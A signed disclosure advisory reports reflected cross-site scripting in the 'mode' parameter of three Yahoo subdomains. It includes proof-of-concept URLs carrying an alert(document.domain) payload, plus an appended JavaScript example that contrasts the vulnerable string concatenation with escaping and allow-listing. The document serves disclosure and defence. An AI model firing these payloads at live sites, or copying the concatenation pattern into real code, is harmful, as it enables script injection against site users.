Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In Jan '14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'mode'-Parameter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability.

==========================
PoC-Exploit
==========================

http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================

20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----
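
The following is an added example, not part of the original advisory and not Yahoo's code. The advisory does not state where 'mode' is reflected, so the example assumes a double-quoted JavaScript string in an inline script block. All function names, the template and the allow-list are hypothetical. It shows the concatenating pattern beside an output-encoded one, plus an allow-list check.

```javascript
// Constructed input: the 'mode' value taken from the PoC URLs in the advisory.
const pocMode = 'multipart"-alert(document.domain)-"';

// Assumed vulnerable pattern: the parameter is concatenated into a JS string.
function renderNaive(mode) {
  return '<script>var cfg = {mode: "' + mode + '"};</script>';
}

// Encode a value as a JS string literal that is also safe inside <script>:
// JSON.stringify escapes quotes and backslashes, the replaces stop the HTML
// parser from seeing "</script>" or "<!--" inside the literal.
function escapeForInlineScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

function renderEscaped(mode) {
  return '<script>var cfg = {mode: ' + escapeForInlineScript(mode) + '};</script>';
}

// Input validation as a second layer. Only 'multipart' appears on the page;
// the real set of accepted values is unknown (placeholder list).
const ALLOWED_MODES = new Set(['multipart']);
function validateMode(mode) {
  return ALLOWED_MODES.has(mode) ? mode : null;
}

// Test harness: evaluate the script body with stubbed alert/document and
// report whether the reflected value was executed as code.
function alertFires(html) {
  const body = html.replace(/^<script>/, '').replace(/<\/script>$/, '');
  let fired = false;
  new Function('alert', 'document', body)(
    () => { fired = true; },
    { domain: 'example.test' } // constructed stub
  );
  return fired;
}

console.log('naive executes input:  ', alertFires(renderNaive(pocMode)));
console.log('escaped executes input:', alertFires(renderEscaped(pocMode)));
console.log('allow-list result:     ', validateMode(pocMode));
```
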